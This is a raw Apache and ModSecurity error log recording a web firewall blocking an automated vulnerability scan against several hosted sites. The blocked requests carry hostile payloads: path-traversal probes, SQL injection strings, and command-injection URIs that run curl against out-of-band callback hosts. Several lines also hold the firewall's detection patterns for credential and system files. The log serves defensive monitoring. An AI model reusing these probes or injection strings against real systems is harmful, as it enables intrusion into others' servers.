[Tue May 26 12:52:45.362879 2026] [security2:error] [pid 461618:tid 461830] [client 20.104.227.76:30673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.glorodavionics.com"] [uri "/wk/index.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kkgAAANc"]
[Tue May 26 12:52:45.465498 2026] [security2:error] [pid 461618:tid 461824] [client 23.94.40.119:33958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/opensis/index.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kmQAAANE"]
[Tue May 26 12:52:45.579636 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:33980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/magmi/web/magmi_run.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kmwAAAMQ"]
[Tue May 26 12:52:45.580965 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:33994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:fileName. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ahVKRVyiSlSCHr1fdr2knAAAALc"]
[Tue May 26 12:52:45.677551 2026] [security2:error] [pid 461618:tid 461832] [client 23.94.40.119:33998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/graph_realtime.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kowAAANk"]
[Tue May 26 12:52:45.680893 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:34010] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKRVyiSlSCHr1fdr2kpAAAALI"]
[Tue May 26 12:52:45.683220 2026] [security2:error] [pid 461618:tid 461834] [client 23.94.40.119:34026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/api/jsonws/invoke"] [unique_id "ahVKRVyiSlSCHr1fdr2kpQAAANs"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
[Tue May 26 12:52:45.683848 2026] [security2:error] [pid 461618:tid 461791] [client 23.94.40.119:34020] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/mainfunction.cgi"] [unique_id "ahVKRVyiSlSCHr1fdr2kpgAAALA"]
[Tue May 26 12:52:45.866431 2026] [security2:error] [pid 461618:tid 461858] [client 23.94.40.119:34042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kqQAAAPM"]
[Tue May 26 12:52:45.866847 2026] [cgid:error] [pid 461618:tid 461825] [client 23.94.40.119:34034] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/libagent.cgi: script not found or unable to stat
[Tue May 26 12:52:45.867689 2026] [security2:error] [pid 461618:tid 461795] [client 23.94.40.119:34056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\\\\*|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\\\\*| |\\\\{|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]|\\\\bunion\\\\b.{1,256}?select.{1,256}[a-z0-9\\\\(\\\\)].{1,256}(?:from|#| ..." at ARGS:username. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "296"] [id "340016"] [rev "46"] [msg "Atomicorp.com WAF Rules: Attack Blocked - SQL injection attempt detected"] [data "union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/eonapi/getApiKey"] [unique_id "ahVKRVyiSlSCHr1fdr2kqgAAALQ"]
[Tue May 26 12:52:46.091794 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:34064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/getcfg.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kuwAAAKM"]
[Tue May 26 12:52:46.145647 2026] [security2:error] [pid 461618:tid 461774] [client 157.20.138.61:56683] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kvQAAAJ8"]
[Tue May 26 12:52:46.145780 2026] [security2:error] [pid 461618:tid 461774] [client 157.20.138.61:56683] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kvQAAAJ8"]
[Tue May 26 12:52:46.293136 2026] [security2:error] [pid 461618:tid 461753] [client 23.94.40.119:34090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kyQAAAIo"]
[Tue May 26 12:52:46.355961 2026] [security2:error] [pid 461618:tid 461768] [client 23.94.40.119:34098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/magmi/web/info.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kygAAAJk"]
[Tue May 26 12:52:46.391640 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:34118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/index.php"] [unique_id "ahVKRlyiSlSCHr1fdr2k0QAAANM"]
[Tue May 26 12:52:46.852696 2026] [security2:error] [pid 461618:tid 461781] [client 23.94.40.119:34150] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:procedure\\\\s+analyse\\\\s.{0,100}\\\\(|create\\\\s+(procedure|function)\\\\s.{0,100}\\\\w+\\\\s.{0,100}\\\\(\\\\s.{0,200}\\\\)\\\\s.{0,100}declare[^\\\\w]+[@#]\\\\s.{0,100}\\\\w+|exec\\\\s.{0,100}\\\\(\\\\s.{0,200}@|\\\\b(?:sleep|benchmark)\\\\b ?\\\\( ?[0-9])" at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "273"] [id "380122"] [rev "5"] [msg "Atomicorp.com WAF Rules: MySQL and PostgreSQL stored procedure/function injections"] [data "sleep(6"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/eonapi/getApiKey"] [unique_id "ahVKRlyiSlSCHr1fdr2k6wAAAKY"]
[Tue May 26 12:52:46.869198 2026] [security2:error] [pid 461618:tid 461874] [client 23.94.40.119:34164] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upload"] [unique_id "ahVKRlyiSlSCHr1fdr2k7gAAAQM"]
[Tue May 26 12:52:47.082079 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:34182] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/storfs-asup"] [unique_id "ahVKR1yiSlSCHr1fdr2k_QAAAI0"]
[Tue May 26 12:52:47.376419 2026] [autoindex:error] [pid 461618:tid 461838] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:52:47.542989 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:34194] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "curl http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgz7fdto5mdq4wt.oast.fun+-H+'User-Agent:+wj58VO'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgadczq8jhp1bjm.oast.fun+-H+'User-Agent:+wj58VO'};"] [unique_id "ahVKR1yiSlSCHr1fdr2lJQAAAPs"]
[Tue May 26 12:52:47.546717 2026] [security2:error] [pid 461618:tid 461860] [client 23.94.40.119:34192] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "curl http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgmgnffcd3ntgb9.oast.fun+-H+'User-Agent:+wj58VO'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgzyrie1cqwmgi5.oast.fun+-H+'User-Agent:+wj58VO'};"] [unique_id "ahVKR1yiSlSCHr1fdr2lJgAAAPU"]
[Tue May 26 12:52:47.567279 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:34218] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/tmshCmd.jsp"] [unique_id "ahVKR1yiSlSCHr1fdr2lKAAAAOA"]
[Tue May 26 12:52:47.770940 2026] [security2:error] [pid 461618:tid 461832] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKR1yiSlSCHr1fdr2lIQAAANk"]
[Tue May 26 12:52:47.841838 2026] [security2:error] [pid 461618:tid 461864] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVKR1yiSlSCHr1fdr2lLwAAAPk"], referer: https://www.ucdc.co.in/
[Tue May 26 12:52:47.993351 2026] [security2:error] [pid 461618:tid 461801] [client 23.94.40.119:35968] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/fileSave.jsp"] [unique_id "ahVKR1yiSlSCHr1fdr2lNwAAALo"]
[Tue May 26 12:52:48.289135 2026] [security2:error] [pid 461618:tid 461751] [client 23.94.40.119:35998] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/tmshCmd.jsp"] [unique_id "ahVKSFyiSlSCHr1fdr2lPAAAAIg"]
[Tue May 26 12:52:48.370058 2026] [security2:error] [pid 461618:tid 461852] [client 23.94.40.119:36012] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apply_sec.cgi"] [unique_id "ahVKSFyiSlSCHr1fdr2lPgAAAO0"]
[Tue May 26 12:52:48.370846 2026] [security2:error] [pid 461618:tid 461857] [client 23.94.40.119:36016] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ahVKSFyiSlSCHr1fdr2lPwAAAPI"]
[Tue May 26 12:52:48.446885 2026] [cgid:error] [pid 461618:tid 461810] [client 23.94.40.119:36020] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/init_ctl.cgi: script not found or unable to stat
[Tue May 26 12:52:48.555899 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:36034] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/tmshCmd.jsp"] [unique_id "ahVKSFyiSlSCHr1fdr2lRwAAANM"]
[Tue May 26 12:52:48.593944 2026] [cgid:error] [pid 461618:tid 461752] [client 23.94.40.119:36048] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/mt: script not found or unable to stat
[Tue May 26 12:52:48.613463 2026] [ssl:error] [pid 461618:tid 461837] [client 23.94.40.119:36064] AH02032: Hostname www.madrasbarassociation.org.in.svijaykumar.in provided via SNI and hostname d8akjpc38ndbrs5c98fgxkxzgpbsiiogc.oast.fun provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:52:48.634782 2026] [security2:error] [pid 461618:tid 461780] [client 23.94.40.119:36076] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apply_sec.cgi"] [unique_id "ahVKSFyiSlSCHr1fdr2lTgAAAKU"]
[Tue May 26 12:52:49.380616 2026] [security2:error] [pid 461618:tid 461836] [client 23.94.40.119:36086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKSVyiSlSCHr1fdr2lZAAAAN0"]
[Tue May 26 12:52:49.490285 2026] [autoindex:error] [pid 461618:tid 461833] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:52:49.730735 2026] [security2:error] [pid 461618:tid 461828] [client 23.94.40.119:36104] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adminer/adminer.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcQAAANU"]
[Tue May 26 12:52:49.731198 2026] [security2:error] [pid 461618:tid 461850] [client 23.94.40.119:36092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adminer.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcAAAAOs"]
[Tue May 26 12:52:49.737500 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:36120] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/_adminer.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcgAAAKM"]
[Tue May 26 12:52:49.738510 2026] [security2:error] [pid 461618:tid 461785] [client 23.94.40.119:36110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adminer/index.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcwAAAKo"]
[Tue May 26 12:52:49.738638 2026] [security2:error] [pid 461618:tid 461814] [client 23.94.40.119:36126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/_adminer/index.php"] [unique_id "ahVKSVyiSlSCHr1fdr2ldAAAAMc"]
[Tue May 26 12:52:49.739608 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:36090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKSVyiSlSCHr1fdr2ldQAAAMo"]
[Tue May 26 12:52:50.558818 2026] [security2:error] [pid 461618:tid 461774] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKSlyiSlSCHr1fdr2lhAAAAJ8"]
[Tue May 26 12:52:50.985741 2026] [security2:error] [pid 461618:tid 461749] [client 23.94.40.119:36152] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-json/buddypress/v1/signup"] [unique_id "ahVKSlyiSlSCHr1fdr2loQAAAIY"]
[Tue May 26 12:52:51.474352 2026] [security2:error] [pid 461618:tid 461810] [client 23.94.40.119:36190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKS1yiSlSCHr1fdr2lsgAAAMM"]
[Tue May 26 12:52:51.793123 2026] [security2:error] [pid 461618:tid 461852] [client 185.191.171.16:56918] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVKS1yiSlSCHr1fdr2lvQAAAO0"]
[Tue May 26 12:52:51.793282 2026] [security2:error] [pid 461618:tid 461852] [client 185.191.171.16:56918] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVKS1yiSlSCHr1fdr2lvQAAAO0"]
[Tue May 26 12:52:51.870134 2026] [security2:error] [pid 461618:tid 461837] [client 23.94.40.119:36218] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/logupload"] [unique_id "ahVKS1yiSlSCHr1fdr2lvgAAAN4"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:52.593343 2026] [cgid:error] [pid 461618:tid 461808] [client 23.94.40.119:36294] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/cgiServer: script not found or unable to stat
[Tue May 26 12:52:52.749394 2026] [security2:error] [pid 461618:tid 461794] [client 23.94.40.119:36308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/api/v1/method.callAnon/getPasswordPolicy"] [unique_id "ahVKTFyiSlSCHr1fdr2l4gAAALM"]
[Tue May 26 12:52:52.927547 2026] [security2:error] [pid 461618:tid 461860] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKTFyiSlSCHr1fdr2l3AAAAPU"]
[Tue May 26 12:52:53.374021 2026] [security2:error] [pid 461618:tid 461809] [client 23.94.40.119:36340] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/template"] [unique_id "ahVKTVyiSlSCHr1fdr2mKwAAAMI"]
[Tue May 26 12:52:53.481760 2026] [security2:error] [pid 461618:tid 461758] [client 23.94.40.119:36348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/elFinder/php/connector.minimal.php"] [unique_id "ahVKTVyiSlSCHr1fdr2mLAAAAI8"]
